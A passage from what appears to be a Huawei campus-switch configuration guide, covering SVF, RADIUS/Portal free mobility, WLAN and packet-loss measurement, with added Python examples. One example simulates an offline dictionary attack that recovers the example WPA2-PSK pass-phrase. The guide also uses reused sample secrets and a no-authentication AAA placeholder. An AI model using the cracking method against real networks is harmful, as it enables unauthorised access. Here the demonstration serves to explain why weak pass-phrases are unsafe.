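        if row["model"] != model:
            findings.append(f"model: {name} ({mac}) reports {row['model']}, planned {model}")
    for mac, row in seen.items():
        if mac not in planned_by_mac:
            findings.append(f"unplanned: {row['name']} ({mac}, {row['ip']}) is not in the AS plan")
    return sorted(findings)


if __name__ == "__main__":
    for cmd in whitelist_commands(PLANNED_AS):
        print(cmd)
    for finding in reconcile(PLANNED_AS, SAMPLE_DISPLAY_AS_ALL):
        print(finding)
```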

Configure an AP to connect to an AS. The following example describes how to connect AP_1
to AS_3, and the procedure for connecting AP_2 to AS_2 is not mentioned here.
1. Create a network basic profile, and specify a pass-VLAN for mobile terminals connected
to AP_1.
<HUAWEI> system-view
[HUAWEI] uni-mng
[HUAWEI-um] network-basic-profile name profile_ap
[HUAWEI-um-net-basic-profile_ap] pass-vlan 202
[HUAWEI-um-net-basic-profile_ap] quit

2. Add the port connecting AS_3 to AP_1 to an AP port group.


[HUAWEI-um] port-group connect-ap name group_ap
[HUAWEI-um-portgroup-group_ap] network-basic-profile profile_ap
[HUAWEI-um-portgroup-group_ap] as name as3 interface gigabitethernet 0/0/24
[HUAWEI-um-portgroup-group_ap] quit
[HUAWEI-um] commit as all
Warning: Committing the configuration will take a long time. Continue?[Y/N]:y
[HUAWEI-um] quit

3. Configure access parameters for AP_1.


# Configure the AP ID.
If the switch is running V200R007C00 or V200R008C00, run:
[HUAWEI] wlan
[HUAWEI-wlan-view] ap id 1 ap-type ap5010dn-agn mac ac85-3da6-a420
[HUAWEI-wlan-ap-1] quit

If the switch is running V200R009C00 and later versions, run:


[HUAWEI] wlan
[HUAWEI-wlan-view] ap-id 1 ap-type ap5010dn-agn ap-mac ac85-3da6-a420
[HUAWEI-wlan-ap-1] quit

# Configure AP_1 to connect to the SVF system without authentication.


If the switch is running V200R007C00 or V200R008C00, run:
[HUAWEI-wlan-view] ap-auth-mode no-auth
[HUAWEI-wlan-view] quit

If the switch is running V200R009C00 and later versions, run:


[HUAWEI-wlan-view] ap auth-mode no-auth
[HUAWEI-wlan-view] quit

4. Power on AP_1 and connect AP_1 to AS_3 using cables.


# After connecting the cables, run the display ap all command to check whether AP_1
has connected to the SVF system successfully.
In V200R007C00 or V200R008C00, the following information is displayed:

[HUAWEI] display ap all
All AP(s) information:
Normal[1],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP ID  AP Type       AP MAC          Profile/Region ID  AP State  AP Sysname
------------------------------------------------------------------------------
1      AP5010DN-AGN  ac85-3da6-a420  0/0                normal    ap-1
------------------------------------------------------------------------------
Total number: 1,printed: 1

In V200R009C00 and later versions, the following information is displayed:


[HUAWEI] display ap all
Total AP information:
nor : normal [1]
-------------------------------------------------------------------------------------------------
ID  MAC             Name            Group    IP              Type          State  STA  Uptime
-------------------------------------------------------------------------------------------------
1   ac85-3da6-a420  ac85-3da6-a420  default  192.168.11.254  AP5010DN-AGN  nor    0    6H:3M:40S
-------------------------------------------------------------------------------------------------
Total: 1

Configure a PC to connect to an AS. The following example describes how to connect PC_1
to AS_3, and the procedure for connecting PC_2 to AS_2 is not mentioned here.
1. Create a network basic profile.
[HUAWEI] uni-mng
[HUAWEI-um] network-basic-profile name profile_1
[HUAWEI-um-net-basic-profile_1] user-vlan 100
[HUAWEI-um-net-basic-profile_1] quit
[HUAWEI-um] quit

2. Create a network basic profile and a user access profile.


The configuration in V200R007C00 or V200R008C00 is as follows:
[HUAWEI] uni-mng
[HUAWEI-um] user-access-profile name pro1
[HUAWEI-um-user-access-pro1] authentication dot1x
[HUAWEI-um-user-access-pro1] quit

The configuration in V200R009C00 and later versions is as follows:


[HUAWEI] dot1x-access-profile name 1
[HUAWEI-dot1x-access-profile-1] quit
[HUAWEI] authentication-profile name dot1x_auth
[HUAWEI-authen-profile-dot1x_auth] dot1x-access-profile 1
[HUAWEI-authen-profile-dot1x_auth] quit
[HUAWEI] uni-mng
[HUAWEI-um] user-access-profile name pro1
[HUAWEI-um-user-access-pro1] authentication-profile dot1x_auth

3. Create a group, and bind the network basic profile and user access profile to the group.
[HUAWEI-um] port-group name group1
[HUAWEI-um-portgroup-group1] network-basic-profile profile_1
[HUAWEI-um-portgroup-group1] user-access-profile pro1
[HUAWEI-um-portgroup-group1] as name as3 interface GigabitEthernet 0/0/23
[HUAWEI-um] commit as name as3
[HUAWEI-um] quit

4. Configure the AAA authentication scheme and domain used when PC_1 connects to AS_3.
The scheme below uses authentication-mode none, which admits any 802.1X user without
checking credentials; it is only a placeholder for bringing the SVF user link up. Before
production use, point the scheme at the RADIUS server (authentication-mode radius), as the
free mobility procedure below does.


[HUAWEI] aaa
[HUAWEI-aaa] authentication-scheme sch1
[HUAWEI-aaa-authen-sch1] authentication-mode none
[HUAWEI-aaa-authen-sch1] quit
[HUAWEI-aaa] domain pc
[HUAWEI-aaa-domain-pc] authentication-scheme sch1
[HUAWEI-aaa-domain-pc] quit
[HUAWEI-aaa] quit
5. Check whether the user has connected to the SVF system.
If the user is dynamically configured to connect to an SVF system, perform shutdown
and undo shutdown operations to reconnect the wired user to the SVF system. Run the
display access-user command to check whether the user has connected to the SVF
system.
[HUAWEI] uni-mng
[HUAWEI-um] as name as3
[HUAWEI-um-as-as3] shutdown interface gigabitethernet 0/0/23
[HUAWEI-um-as-as3] undo shutdown interface gigabitethernet 0/0/23
[HUAWEI-um-as-as3] quit
[HUAWEI-um] quit

Free Mobility Configuration Procedure


1. Create and configure a RADIUS server template, an AAA authentication scheme, and an
authentication domain.
# Create and configure a RADIUS server template rd1.
[HUAWEI] radius-server template rd1
[HUAWEI-radius-rd1] radius-server authentication 192.168.2.31 1812
[HUAWEI-radius-rd1] radius-server shared-key cipher Huawei@123
[HUAWEI-radius-rd1] quit
# Create an AAA authentication scheme abc, and set the authentication mode to
RADIUS.
[HUAWEI] aaa
[HUAWEI-aaa] authentication-scheme abc
[HUAWEI-aaa-authen-abc] authentication-mode radius
[HUAWEI-aaa-authen-abc] quit
# Create an authentication domain isp1, and bind the AAA authentication scheme abc
and RADIUS server template rd1 to the domain.
[HUAWEI-aaa] domain isp1
[HUAWEI-aaa-domain-isp1] authentication-scheme abc
[HUAWEI-aaa-domain-isp1] radius-server rd1
[HUAWEI-aaa-domain-isp1] quit
[HUAWEI-aaa] quit
# Configure a global default domain isp1. If a user name does not contain a domain
name or contains an invalid domain name, the user is authenticated in the default
domain.
[HUAWEI] domain isp1
2. Configure 802.1x authentication and web authentication.
# Create and configure a Portal server template abc.
[HUAWEI] web-auth-server abc
[HUAWEI-web-auth-server-abc] server-ip 192.168.2.31
[HUAWEI-web-auth-server-abc] url http://192.168.2.31:50200/webagent
[HUAWEI-web-auth-server-abc] shared-key cipher Huawei@123
[HUAWEI-web-auth-server-abc] quit
# Enable 802.1x authentication and web authentication on GE1/1/0/1.
[HUAWEI] interface gigabitethernet 1/1/0/1
[HUAWEI-GigabitEthernet1/1/0/1] authentication dot1x portal
[HUAWEI-GigabitEthernet1/1/0/1] web-auth-server abc direct //Bind the Portal server template to GE1/1/0/1.
[HUAWEI-GigabitEthernet1/1/0/1] quit
# Enable the free mobility function, and configure an IP address for the Agile Controller
server and a password used for communicating with the Agile Controller.
[HUAWEI] group-policy controller 192.168.2.31 password Huawei@123

3. Perform the following configurations on the Agile Controller.


The Agile Controller is configured through its own web interface, which is not shown
here. For details, see the Agile Controller product documentation. The configuration
roadmap is as follows.
a. Create user accounts in source security groups. For example, you can configure user
names, passwords, and departments for common guests, undergraduates,
postgraduates, and teachers.
b. Configure RADIUS, Portal, and XMPP parameters, and add the core switch to
ensure that the S series switches can communicate with the Agile Controller.
c. Configure source security groups and destination security groups to indicate users
and resources respectively. For example, the IP address of the public resource
server is 10.10.1.1/32.
d. Use fast authorization to authorize a source security group to the corresponding
department. Users are mapped to the source security group after being
authenticated.
e. Configure access control policies and specify whether users in a source security
group are permitted to access a destination security group. Deploy the access
control policies on all devices on the network. For example, common guests can
only access the public resources, and cannot access the education management
system and internal FTP resources.

Table 2-11 Security groups and access control policies configured on the Agile Controller

Source Security Group (User)   Destination Security Group (Resource)                          Access Control Policy
Common guest                   Public resources (bound IP address: 10.10.1.1/32)              Permit
                               Education management system (bound IP address: 10.10.2.1/32)   Forbid
                               FTP resources (bound IP address: 10.10.3.1/32)                 Forbid
Undergraduate or postgraduate  Public resources (bound IP address: 10.10.1.1/32)              Permit
                               Education management system (bound IP address: 10.10.2.1/32)   Forbid
                               FTP resources (bound IP address: 10.10.3.1/32)                 Permit
Teacher                        Public resources (bound IP address: 10.10.1.1/32)              Permit
                               Education management system (bound IP address: 10.10.2.1/32)   Permit
                               FTP resources (bound IP address: 10.10.3.1/32)                 Permit
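The RADIUS template in step 1 of the free mobility procedure carries a shared key
(radius-server shared-key cipher Huawei@123), and the same placeholder value is reused for
the Portal template and the group-policy controller password. That key is the only thing
binding the switch's authentication traffic to the server: it hides the User-Password
attribute and keys the Message-Authenticator the server checks, so it should be long,
random, and different per peer in production. The following Python script is an added
example, not code from the Huawei page or from the Agile Controller. It builds and checks an
Access-Request the way RFC 2865 section 5.2 and RFC 3579 section 3.2 specify; the secret,
user name, password, and Request Authenticator are constructed values.

```python
import hashlib
import hmac
import os
import struct

# Constructed values for this example (not from the Huawei page). The secret
# mirrors the value given to "radius-server shared-key" in the configuration.
SHARED_SECRET = b"Huawei@123"

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_MESSAGE_AUTHENTICATOR = 80
HEADER_LEN = 20  # code(1) id(1) length(2) authenticator(16)


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 5.2: pad to a multiple of 16, then XOR each block with
    MD5(secret + previous ciphertext block), seeded with the Request Authenticator."""
    if not 0 < len(password) <= 128:
        raise ValueError("password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), authenticator
    for i in range(0, len(padded), 16):
        pad = hashlib.md5(secret + prev).digest()
        block = bytes(a ^ b for a, b in zip(padded[i:i + 16], pad))
        out += block
        prev = block
    return bytes(out)


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of hide_password; the NUL padding added by the sender is stripped."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden password must be a non-empty multiple of 16 bytes")
    out, prev = bytearray(), authenticator
    for i in range(0, len(hidden), 16):
        pad = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out += bytes(a ^ b for a, b in zip(block, pad))
        prev = block
    return bytes(out).rstrip(b"\x00")


def attr(atype: int, value: bytes) -> bytes:
    """One RADIUS attribute TLV: type(1) length(1) value."""
    if len(value) > 253:
        raise ValueError("attribute value too long")
    return struct.pack("!BB", atype, len(value) + 2) + value


def build_access_request(ident: int, username: bytes, password: bytes,
                         secret: bytes, authenticator: bytes) -> bytes:
    attrs = attr(ATTR_USER_NAME, username)
    attrs += attr(ATTR_USER_PASSWORD, hide_password(password, secret, authenticator))
    # RFC 3579 3.2: Message-Authenticator = HMAC-MD5(secret, whole packet with
    # the attribute's own 16-byte value set to zero).
    zeroed = attr(ATTR_MESSAGE_AUTHENTICATOR, b"\x00" * 16)
    length = HEADER_LEN + len(attrs) + len(zeroed)
    header = struct.pack("!BBH", ACCESS_REQUEST, ident, length) + authenticator
    mac = hmac.new(secret, header + attrs + zeroed, hashlib.md5).digest()
    return header + attrs + attr(ATTR_MESSAGE_AUTHENTICATOR, mac)


def parse_attrs(packet: bytes) -> list:
    """Return [(type, value), ...]; rejects a bad length field and truncated TLVs."""
    if len(packet) < HEADER_LEN or struct.unpack("!H", packet[2:4])[0] != len(packet):
        raise ValueError("length field does not match packet size")
    attrs, pos = [], HEADER_LEN
    while pos < len(packet):
        if pos + 2 > len(packet):
            raise ValueError("truncated attribute header")
        atype, alen = struct.unpack("!BB", packet[pos:pos + 2])
        if alen < 2 or pos + alen > len(packet):
            raise ValueError("malformed attribute")
        attrs.append((atype, packet[pos + 2:pos + alen]))
        pos += alen
    return attrs


def verify_message_authenticator(packet: bytes, secret: bytes) -> bool:
    """True only if a Message-Authenticator is present and matches. A packet
    without one is rejected rather than trusted."""
    try:
        parse_attrs(packet)
    except ValueError:
        return False
    pos = HEADER_LEN
    while pos < len(packet):
        atype, alen = struct.unpack("!BB", packet[pos:pos + 2])
        if atype == ATTR_MESSAGE_AUTHENTICATOR and alen == 18:
            received = packet[pos + 2:pos + 18]
            zeroed = packet[:pos + 2] + b"\x00" * 16 + packet[pos + 18:]
            expected = hmac.new(secret, zeroed, hashlib.md5).digest()
            return hmac.compare_digest(received, expected)
        pos += alen
    return False


if __name__ == "__main__":
    ra = os.urandom(16)  # Request Authenticator: fresh random value per request
    pkt = build_access_request(1, b"student1", b"s3cret-pw", SHARED_SECRET, ra)
    print("valid with the configured secret:", verify_message_authenticator(pkt, SHARED_SECRET))
    print("valid with a guessed secret:     ", verify_message_authenticator(pkt, b"guess"))
```

Two things the script makes visible: the password hiding is MD5-keyed XOR with no integrity
of its own, so the Message-Authenticator (and an isolated management VLAN or a TLS tunnel
between switch and server) is what actually stops a forged or replayed request; and because
the Request Authenticator must be fresh per packet, a device that reuses it leaks the MD5
keystream across requests.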

Wired and Wireless Convergence Configuration Procedure


After wired and wireless convergence is configured on an agile switch, you configure only the
agile switch; there is no need to configure the switch and an independent AC or ACU2
separately.
1. Configure the S12708 to function as a DHCP server to assign IP addresses to PCs and
STAs. The S12708 assigns IP addresses to APs through SVF. You do not need to
configure the S12708 to assign IP addresses to APs. The following example describes
how the S12708 assigns IP addresses to the PCs and STAs in teaching area 1.
# Configure the S12708 to assign an IP address to PC_1 from the global address pool.
<HUAWEI> system-view
[HUAWEI] dhcp enable
[HUAWEI] vlan batch 100 202
[HUAWEI] interface vlanif 100
[HUAWEI-Vlanif100] ip address 192.168.100.1 24
[HUAWEI-Vlanif100] dhcp select global
[HUAWEI-Vlanif100] quit
[HUAWEI] ip pool 100
[HUAWEI-ip-pool-100] gateway-list 192.168.100.1
[HUAWEI-ip-pool-100] network 192.168.100.0 mask 24
[HUAWEI-ip-pool-100] quit
# Configure the S12708 to assign IP addresses to STAs from the global address pool.
The IP addresses in the address pool 202 are assigned to the STAs connected to AP_1,
and the IP addresses in the address pool 204 are assigned to the STAs connected to
AP_2.
The following example describes how the S12708 assigns IP addresses to the STAs
connected to AP_1.
[HUAWEI] interface vlanif 202
[HUAWEI-Vlanif202] ip address 192.168.202.1 24
[HUAWEI-Vlanif202] dhcp select global
[HUAWEI-Vlanif202] quit
[HUAWEI] ip pool 202
[HUAWEI-ip-pool-202] gateway-list 192.168.202.1
[HUAWEI-ip-pool-202] network 192.168.202.0 mask 24
[HUAWEI-ip-pool-202] quit
2. Configure the AC's system parameters.
# Configure the AC's country code.
[HUAWEI] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use the global country code and reset them, continue?[Y/N]:y
# Configure the AC ID and carrier ID.
[HUAWEI] wlan ac-global ac id 1 carrier id other //The AC ID is 0 by default. In this example, the AC ID is changed to 1.
# Configure the AC's source interface.
[HUAWEI] wlan
[HUAWEI-wlan-view] wlan ac source interface vlanif 11
3. Configure the AC to manage APs.
# Check the AP type ID after obtaining the AP's MAC address.
[HUAWEI-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
1 AP5010DN-AGN
------------------------------------------------------------------------------
Total number: 1


# Set the AP authentication mode to MAC address authentication (default setting). Add
the APs offline according to the obtained AP type ID. The configuration of AP access
parameters is described in the SVF configuration procedure, and will not be described
here.
# Configure an AP region and add the APs to the region.
[HUAWEI-wlan-view] ap-region id 10
[HUAWEI-wlan-ap-region-10] quit
[HUAWEI-wlan-view] ap id 1
[HUAWEI-wlan-ap-1] region-id 10
[HUAWEI-wlan-ap-1] quit
[HUAWEI-wlan-view] ap id 2
[HUAWEI-wlan-ap-2] region-id 10
[HUAWEI-wlan-ap-2] quit

# After powering on the AP, run the display ap all command on the AC to check the AP
state. The command output shows that the AP state is normal.
[HUAWEI-wlan-view] display ap all
All AP information:
Normal[1],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP ID  AP Type        AP MAC          Profile/Region ID  AP State  AP Sysname
------------------------------------------------------------------------------
0      AP6010DN-AGN   60de-4476-e360  0/10               normal    ap-0
------------------------------------------------------------------------------
Total number: 1,printed: 1

4. Configure the WLAN service parameters.


# Create a WMM profile wmm.
[HUAWEI-wlan-view] wmm-profile name wmm id 1
[HUAWEI-wlan-wmm-prof-wmm] quit

# Create a radio profile radio, and bind the WMM profile wmm to the radio profile.
[HUAWEI-wlan-view] radio-profile name radio id 1
[HUAWEI-wlan-radio-prof-radio] wmm-profile name wmm
[HUAWEI-wlan-radio-prof-radio] quit
[HUAWEI-wlan-view] quit

# Create a WLAN-ESS interface.


[HUAWEI] interface wlan-ess 1
[HUAWEI-Wlan-Ess1] port trunk allow-pass vlan 202
[HUAWEI-Wlan-Ess1] quit

# Create a security profile security.


[HUAWEI] wlan
[HUAWEI-wlan-view] security-profile name security id 1
[HUAWEI-wlan-sec-prof-security] security-policy wpa2 //Set the security policy to WPA2.
[HUAWEI-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher huawei123 encryption-method ccmp //Set the authentication method to PSK and the encryption method to CCMP (AES).
[HUAWEI-wlan-sec-prof-security] quit

# Create a traffic profile traffic and set the STA's uplink rate limit to 2000 kbit/s and
downlink rate limit to 2400 kbit/s.
[HUAWEI-wlan-view] traffic-profile name traffic id 1
[HUAWEI-wlan-traffic-prof-traffic] rate-limit client up 2000
[HUAWEI-wlan-traffic-prof-traffic] rate-limit client down 2400
[HUAWEI-wlan-traffic-prof-traffic] quit

# Create a service set area1, and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set. Set the forwarding mode to direct forwarding (default
setting).

[HUAWEI-wlan-view] service-set name area1 id 1
[HUAWEI-wlan-service-set-area1] ssid area1
[HUAWEI-wlan-service-set-area1] wlan-ess 1
[HUAWEI-wlan-service-set-area1] security-profile name security
[HUAWEI-wlan-service-set-area1] traffic-profile name traffic
[HUAWEI-wlan-service-set-area1] service-vlan 202
[HUAWEI-wlan-service-set-area1] quit

5. Configure a virtual AP (VAP) and deliver it to an AP.


# Configure a VAP.
[HUAWEI-wlan-view] ap 1 radio 0
[HUAWEI-wlan-radio-1/0] radio-profile name radio
[HUAWEI-wlan-radio-1/0] service-set name area1
[HUAWEI-wlan-radio-1/0] quit

# Commit the configuration.


[HUAWEI-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
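The security profile in step 4 uses WPA2-PSK with the pass-phrase huawei123. With PSK, the
256-bit key that protects the 4-way handshake is derived from nothing but the pass-phrase and
the SSID, so anyone who captures one handshake can test candidate pass-phrases offline at
PBKDF2 speed; a short dictionary word is found in seconds. The following Python is an added
example and not code from the Huawei page: it derives the PSK exactly as IEEE 802.11i
specifies (PBKDF2-HMAC-SHA1, 4096 iterations, 32 bytes, SSID as salt) and runs a
constructed candidate list against a PSK derived from the page's pass-phrase on a constructed
SSID. The candidate list and SSID are assumptions for illustration.

```python
import hashlib
import hmac


def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The standard restricts the pass-phrase to 8..63 printable ASCII characters."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA pass-phrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def offline_guess(target_psk: bytes, ssid: str, candidates):
    """Simulate the offline attack against a captured handshake: derive the PSK for
    each candidate and compare. (A real cracker compares the handshake MIC derived
    from the PSK; the cost per candidate is the same PBKDF2 call made here.)
    Returns (matching passphrase or None, number of candidates tried)."""
    attempts = 0
    for cand in candidates:
        attempts += 1
        try:
            psk = wpa2_psk(cand, ssid)
        except ValueError:      # too short or too long: cannot be a WPA pass-phrase
            continue
        if hmac.compare_digest(psk, target_psk):
            return cand, attempts
    return None, attempts


# Constructed candidate list (not a real wordlist); "short" is skipped as invalid.
CANDIDATES = ["12345678", "password", "short", "huawei123", "Huawei@123"]

if __name__ == "__main__":
    ssid = "area1"                              # the SSID from the service set
    target = wpa2_psk("huawei123", ssid)        # what the configured pass-phrase yields
    found, tried = offline_guess(target, ssid, CANDIDATES)
    print("recovered pass-phrase:", found, "after", tried, "candidates")
```

The PSK depends on the SSID, so a common SSID lets an attacker precompute tables, and a
common pass-phrase is recoverable by anyone on the air. For an education campus the safer
choice is a long random pass-phrase for guest PSK networks and WPA2-Enterprise (802.1X
against the RADIUS server the same document configures) for staff and student networks,
where each user has individual credentials and a per-session key.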

iPCA Configuration Procedure


NOTE

iPCA can be performed to detect packet loss on agile switches and between agile switches. If you want to
detect packet loss between the main campus and branch campus networks, agile switches need to be deployed
on both networks.

Configure the packet loss measurement function for a device.


1. Enable iPCA on each device to implement packet loss measurement so that you can
know packet loss in a timely manner. Configure the packet loss alarm on each device.
[HUAWEI] iplpm global loss-measure alarm enable //Enable the packet loss alarm and clear alarm on the device.
[HUAWEI] iplpm global loss-measure enable //Enable packet loss measurement.

2. Run the display iplpm loss-measure statistics global command to check the packet loss
measurement results on a device. You can check the values of Loss Packets and
LossRatio to know whether packet loss occurs on a device.
[HUAWEI] display iplpm loss-measure statistics global
Latest global loss statistics:
--------------------------------------------------------------------------------
StartTime(DST)        Loss Packets   LossRatio    ErrorInfo
--------------------------------------------------------------------------------
2015-06-12 18:47:30   344127         4.513519%    OK
2015-06-12 18:47:20   381085         4.513196%    OK
2015-06-12 18:47:10   381192         4.513290%    OK
2015-06-12 18:47:00   381339         4.513341%    OK
2015-06-12 18:46:50   381465         4.513392%    OK
2015-06-12 18:46:40   381444         4.513487%    OK
2015-06-12 18:46:30   381129         4.513309%    OK
--------------------------------------------------------------------------------

Configure the end-to-end packet loss measurement function.


1. Configure the core switches in the main campus.
[HUAWEI] nqa ipfpm dcp //Enable the DCP function globally.
[HUAWEI-nqa-ipfpm-dcp] dcp id 1.1.1.1 //Configure the DCP ID.
[HUAWEI-nqa-ipfpm-dcp] instance 1
[HUAWEI-nqa-ipfpm-dcp-instance-1] mcp 2.2.2.2
[HUAWEI-nqa-ipfpm-dcp-instance-1] flow bidirectional source 10.1.1.0 24 destination 10.2.1.0 24 //Set the target flow to a bidirectional symmetrical flow.
[HUAWEI-nqa-ipfpm-dcp-instance-1] tlp 1 in-point ingress //Color the target flows that enter the network.
[HUAWEI-nqa-ipfpm-dcp-instance-1] quit
[HUAWEI-nqa-ipfpm-dcp] quit
[HUAWEI] interface gigabitethernet 3/1/0/1 //Specify the interface connecting to the core switch in the branch campus.
[HUAWEI-GigabitEthernet3/1/0/1] ipfpm tlp 1 //Bind a Target Logical Port (TLP) to the interface.
[HUAWEI-GigabitEthernet3/1/0/1] quit
[HUAWEI] interface gigabitethernet 3/1/0/2 //Specify the interface connecting to the core switch in the branch campus.
[HUAWEI-GigabitEthernet3/1/0/2] ipfpm tlp 1 //Bind a TLP to the interface.
[HUAWEI-GigabitEthernet3/1/0/2] quit
[HUAWEI] nqa ipfpm dcp
[HUAWEI-nqa-ipfpm-dcp] instance 1
[HUAWEI-nqa-ipfpm-dcp-instance-1] loss-measure enable continual //Enable
the continual packet loss measurement function for the DCP instance.
[HUAWEI-nqa-ipfpm-dcp-instance-1] quit
[HUAWEI-nqa-ipfpm-dcp] quit
2. Configure the core switches in the branch campus.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] nqa ipfpm dcp
[Switch-nqa-ipfpm-dcp] dcp id 2.2.2.2
[Switch-nqa-ipfpm-dcp] instance 1
[Switch-nqa-ipfpm-dcp-instance-1] mcp 2.2.2.2
[Switch-nqa-ipfpm-dcp-instance-1] flow bidirectional source 10.1.1.0 24
destination 10.2.1.0 24
[Switch-nqa-ipfpm-dcp-instance-1] tlp 2 out-point egress
[Switch-nqa-ipfpm-dcp-instance-1] quit
[Switch-nqa-ipfpm-dcp] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] ipfpm tlp 2
[Switch-GigabitEthernet1/0/1] quit
[Switch] nqa ipfpm dcp
[Switch-nqa-ipfpm-dcp] instance 1
[Switch-nqa-ipfpm-dcp-instance-1] loss-measure enable continual
[Switch-nqa-ipfpm-dcp-instance-1] quit
[Switch-nqa-ipfpm-dcp] quit
[Switch] nqa ipfpm mcp //Enable the MCP function globally.
[Switch-nqa-ipfpm-mcp] mcp id 2.2.2.2 //Create a MCP.
[Switch-nqa-ipfpm-mcp] instance 1
[Switch-nqa-ipfpm-mcp-instance-1] dcp 1.1.1.1
[Switch-nqa-ipfpm-mcp-instance-1] dcp 2.2.2.2
[Switch-nqa-ipfpm-mcp-instance-1] loss-measure ratio-threshold upper-limit 7 lower-limit 5 //Set the packet loss alarm threshold to 7% and the clear alarm threshold to 5% for the MCP instance.
[Switch-nqa-ipfpm-mcp-instance-1] quit
[Switch-nqa-ipfpm-mcp] quit
[Switch] quit
3. Verify the configurations.
# Run the display ipfpm statistic-type loss instance 1 command on the core switches in
the branch campus to view the packet loss measurement results.
<Switch> display ipfpm statistic-type loss instance 1

Latest loss statistics of forward flow:

Unit: p - packet, b - byte
------------------------------------------------------------------------------------------
Period       Loss(p)   LossRatio(p)   Loss(b)     LossRatio(b)
------------------------------------------------------------------------------------------
127636768    381549    4.514649%      40444194    4.514649%
127636767    381528    4.514620%      40441968    4.514620%
127636766    381318    4.514996%      40419708    4.514996%
127636765    381192    4.514686%      40406352    4.514686%
127636764    381381    4.514679%      40426386    4.514679%
127636763    381402    4.514748%      40428612    4.514748%
127636762    381081    4.514797%      40394586    4.514797%
127636761    381324    4.514702%      40420344    4.514702%
127636760    381549    4.514870%      40444194    4.514870%
127636759    381066    4.514638%      40392996    4.514638%
127636758    381570    4.514836%      40446420    4.514836%
127636757    382452    4.514757%      40539912    4.514757%

Latest loss statistics of backward flow:

Unit: p - packet, b - byte
------------------------------------------------------------------------------------------
Period       Loss(p)   LossRatio(p)   Loss(b)     LossRatio(b)
------------------------------------------------------------------------------------------
127636768    381087    4.513306%      40395222    4.513306%
127636767    381129    4.513384%      40399674    4.513384%
127636766    381465    4.513444%      40435290    4.513444%
127636765    381087    4.513222%      40395222    4.513222%
127636764    381045    4.513272%      40390770    4.513272%
127636763    381381    4.513364%      40426386    4.513364%
127636762    381276    4.513435%      40415256    4.513435%
127636761    380961    4.513280%      40381866    4.513280%
127636760    381339    4.513574%      40421934    4.513574%
127636759    381045    4.513270%      40390770    4.513270%
127636758    381088    4.513226%      40395328    4.513226%
127636757    382409    4.513464%      40535354    4.513464%
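The MCP instance in step 2 raises a packet loss alarm when the ratio reaches 7% and clears
it only once the ratio falls back to 5%; the gap between the two stops a flow hovering around
one value from flapping the alarm every period. The following Python is an added example,
not code from the Huawei page or from eSight. It parses constructed output in the shape of
display iplpm loss-measure statistics global (the real device prints newest rows first) and
applies the same raise/clear hysteresis over the samples, which is what a collector polling
the CLI would do to turn the table into events. The sample rows, the Stat-Error value in
ErrorInfo, and the use of >= / <= at the thresholds are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample in the shape of the CLI table (not real device output).
SAMPLE_OUTPUT = """\
Latest global loss statistics:
--------------------------------------------------------------------------------
StartTime(DST)        Loss Packets   LossRatio    ErrorInfo
--------------------------------------------------------------------------------
2015-06-12 18:48:10   0              0.000000%    Stat-Error
2015-06-12 18:48:00   300000         4.000000%    OK
2015-06-12 18:47:50   450000         6.000000%    OK
2015-06-12 18:47:40   612000         8.100000%    OK
2015-06-12 18:47:30   344127         4.513519%    OK
--------------------------------------------------------------------------------
"""

# One data row: timestamp, lost packet count, ratio in percent, error column.
ROW = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+(\d+)\s+(\d+(?:\.\d+)?)%\s+(\S+)")


@dataclass(frozen=True)
class LossSample:
    start_time: str
    lost_packets: int
    loss_ratio: float      # percent, as printed by the device
    error_info: str


def parse_loss_table(text: str) -> List[LossSample]:
    """Extract the data rows (headers and rules are skipped) and return them
    oldest first, which is the order a hysteresis detector must consume them in."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append(LossSample(m.group(1), int(m.group(2)),
                                   float(m.group(3)), m.group(4)))
    return sorted(rows, key=lambda s: s.start_time)   # ISO timestamps sort lexically


def alarm_events(samples, upper: float = 7.0, lower: float = 5.0) -> List[Tuple[str, str]]:
    """Raise/clear hysteresis in the style of loss-measure ratio-threshold:
    ALARM when the ratio reaches `upper`, CLEAR only when it falls to `lower`.
    Rows whose ErrorInfo is not OK are reported but never drive the state,
    so a measurement error cannot silently clear a real alarm."""
    if lower >= upper:
        raise ValueError("clear threshold must be below the alarm threshold")
    events, alarmed = [], False
    for s in samples:
        if s.error_info != "OK":
            events.append((s.start_time, "SKIPPED:" + s.error_info))
            continue
        if not alarmed and s.loss_ratio >= upper:
            alarmed = True
            events.append((s.start_time, "ALARM"))
        elif alarmed and s.loss_ratio <= lower:
            alarmed = False
            events.append((s.start_time, "CLEAR"))
    return events


if __name__ == "__main__":
    for when, what in alarm_events(parse_loss_table(SAMPLE_OUTPUT)):
        print(when, what)
```

In the constructed sample the 6.0% row sits between the two thresholds: it neither clears
the alarm raised at 8.1% nor raises a new one, which is the behaviour the upper-limit /
lower-limit pair is meant to give.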

2.4.7 Summary and Recommendations


